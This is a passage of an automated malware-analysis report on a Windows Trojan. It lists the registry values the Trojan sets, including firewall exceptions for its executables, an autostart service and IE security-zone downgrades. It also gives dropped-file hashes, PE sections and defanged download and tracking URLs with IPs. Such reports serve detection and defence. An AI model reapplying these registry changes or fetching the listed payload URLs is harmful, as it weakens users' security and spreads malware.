[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 AE 46 36 24 60 B5 26 DD 0F 6F BD B3 1B E2 A6"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Wuji]
"Wuji.exe" = "%Program Files%\Wuji\Wuji.exe:*:Enabled:WJ"

The process netsh.exe:628 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F5 44 67 5F 5E 3E AE 95 10 EB DA BE 33 C1 CB 2B"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Wuji]
"update.exe" = "%Program Files%\Wuji\update.exe:*:Enabled:WJU"

The process SportLive.exe:908 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\sougop]
"HDiskNum" = "00000000000000000001"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\System\CurrentControlSet\Services\sougop]
"Type" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Services\sougop]
"ErrorControl" = "0"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "SportLive.exe"

[HKLM\System\CurrentControlSet\Services\sougop]
"StFlag" = "200"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\System\CurrentControlSet\Services\sougop]
"ImagePath" = "\??\%Program Files%\TogouInputin\Togoupplib.dat"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1400392493"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 73 BA 77 D6 3D E1 C8 87 D6 84 32 D0 33 6F 0A"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\System\CurrentControlSet\Services\sougop]
"qid" = "165"
"InstFlag" = "1"
"DisplayName" = "Togoupplib"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The following service will be launched automatically at system boot up:

[HKLM\System\CurrentControlSet\Services\sougop]
"Start" = "2"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process MsiExec.exe:1760 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "25 37 FA 3B 16 EA 71 14 EB 9A 16 E8 A9 6A C9 BF"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process %original file name%.exe:1832 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0F FB DB 99 98 F2 8C E4 0F 5A DC 54 52 63 F7 18"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process oemfhsli.exe:628 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\FhRl]
"Path" = "%Program Files%\fhrl"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\FhRl]
"Exit" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\fhrl]
"FhCalendar.exe" = "TODO: <文件说明>"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9C 16 2C 5F 74 64 B4 AC E0 3E CF 48 61 45 D7 F5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
4fd79c74d5e8ccc8b11a1d7bc1a0ef94 c:\Documents and Settings\All Users\Documents\fhrl_6_12001.exe
e1bc857849dcf7a928dbf96dd364060f c:\Program Files\Common Files\Install\fhrlsli\oemfhsli.exe
da61211302dbc86ced4738aff7c7868b c:\Program Files\fhrl\DuiLib_u.dll
911d9454d22938b77368a6da6c413313 c:\Program Files\fhrl\FMDLL.dll
1854bd1de533fd48ece92216fce57ea6 c:\Program Files\fhrl\FMDLL32.dll
ad962279c742cb5f2e32640d160e246c c:\Program Files\fhrl\FMTest.exe
97fea0e5059a5bde0cd59a3294ff3bde c:\Program Files\fhrl\FhCalendar.exe
a570c326ab7a433647c95b4a4669525b c:\Program Files\fhrl\Fhuninstall.exe
8d2cdf0a3c544db534735c8e83842cce c:\Program Files\fhrl\KillProc.exe
4e06c6f59cf9204c435cfa22a7abb669 c:\Program Files\fhrl\Skin\Default\foembin.exe
81a05de047701a946d8a441ffd08aa1a c:\Program Files\fhrl\Update.exe
7c9de379baab0801961a73377a379f14 c:\Program Files\fhrl\uninst.exe
349bf98a0025a50bf8e82158a62faeaa c:\fhsli_6_12001.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: ?????
Product Version: 1.0.0.0
Legal Copyright: ?????? ????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ?????
Comments: ??????????(http://www.eyuyan.com)
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 425984 201728 5.54424 d0ef0aaee25bba1be37747cce181dfcf
.rdata 430080 69632 17920 5.50197 2c2e8d17d10be6f7aa7ca9f9876e0a99
.data 499712 176128 17920 5.51743 4b67851f67928e82417856798afacf3a
.rsrc 675840 790528 246272 5.53726 981a356a8a9ce2514af7897a72a377f8
.aspack 1466368 12288 9728 3.47169 263888398d77ec23c33d8b15fd5d106b
.adata 1478656 4096 0 0 d41d8cd98f00b204e9800998ecf8427e

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://software.fhrlw.cn/slience/fhsli_6_12001.exe 61.147.103.147
hxxp://software.fhrlw.cn/oemini/info.ini?id=41 61.147.103.147
hxxp://s-99273.abc188.com/xxdd_165.exe
hxxp://software.fhrlw.cn/fhrl/fhrl_0613.exe 61.147.103.147
hxxp://dl2.fhrlw.com/fhrl/fhrl_0613.exe 125.211.211.8
hxxp://software.fhrlw.cn/api/GetConfig.ashx 61.147.103.147
hxxp://software.fhrlw.cn/api/Setup.ashx?pid=6&psid=12001&setupcode=ae9b8922d6184874896f5561d8fe0643&mac=000c298a8b37&physn=00000000000000000001&bindsoftcount=0 61.147.103.147
hxxp://software.fhrlw.cn/Update/version.txt?45919992 61.147.103.147
hxxp://software.fhrlw.cn/Api/GetHoliday.ashx 61.147.103.147
hxxp://software.fhrlw.cn/Api/GetWeather.ashx?province=??&city=?? 61.147.103.147
hxxp://software.fhrlw.cn/Api/SendClickData.ashx?pid=6&psid=12001&setupcode=ae9b8922d6184874896f5561d8fe0643&mac=000c298a8b37&physn=00000000000000000001&date=2014-06-14&clickcount1=0&clickcount2=0&clickcount3=0&clickcount4=0 61.147.103.147
hxxp://software.fhrlw.cn/ad/fixad.html?id=9995 61.147.103.147
hxxp://software.fhrlw.cn/js/jquery-1.3.2.min.js 61.147.103.147
hxxp://software.fhrlw.cn/client/picchange.css 61.147.103.147
hxxp://fusa.a.sohu.com/cs/jsfile/js/c.js
hxxp://proxy.sogou.com/ask?id=341269&cb=SOGOU_STAR_SETJSONADSLOT&cxid=
hxxp://proxy.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736450&t1=0&bi=1&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736450&z=9471ea3941afa839&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0M19wcmV0dHkgZG9nXzM0MTI2OQA-
hxxp://proxy.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736451&t1=16&bi=2&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736451&z=5268ebdce938cc9f&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NF9wcmV0dHkgZG9nXzM0MTI2OQA-
hxxp://proxy.sogou.com/qi
hxxp://njsh.cdn.sogou.com/app/a/53/924aed3e-a026-4cc3-996e-72927d75dda5.gif
hxxp://njsh.cdn.sogou.com/testgpimg/sogou_icon_short.png
hxxp://acookie.split.taobao.com/cms.gif?id=40490128&extendata=
hxxp://proxy.sogou.com/pixel?tid=E0&ver=1&extendata=
hxxp://proxy.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736454&t1=0&bi=3&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736453&z=1872c1e9649eade9&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NV9wcmV0dHkgZG9nXzM0MTI2OQA-
hxxp://software.fhrlw.cn//js/picchange.js 61.147.103.147
hxxp://njsh.cdn.sogou.com/app/a/53/82ea18df-b4ae-4b17-b1ab-46cba4b98343.jpg
hxxp://njsh.cdn.sogou.com/app/a/53/48aaf3d6-f95f-4921-8a68-2606aed69a12.gif
hxxp://images.sohu.com/cs/jsfile/js/c.js 66.102.246.139
hxxp://dspcm.brand.sogou.com/pixel?tid=E0&ver=1&extendata= 106.120.151.61
hxxp://dl1.fhrlw.com/fhrl/fhrl_0613.exe 61.147.103.147
hxxp://img.fhrlw.com/client/picchange.css 61.147.103.147
hxxp://img.fhrlw.com//js/picchange.js 61.147.103.147
hxxp://acookie.tanx.com/cms.gif?id=40490128&extendata= 110.75.69.67
hxxp://client.fhrlw.com/api/Setup.ashx?pid=6&psid=12001&setupcode=ae9b8922d6184874896f5561d8fe0643&mac=000c298a8b37&physn=00000000000000000001&bindsoftcount=0 61.147.103.147
hxxp://update.fhrlw.com/Update/version.txt?45919992 61.147.103.147
hxxp://img.fhrlw.com/js/jquery-1.3.2.min.js 61.147.103.147
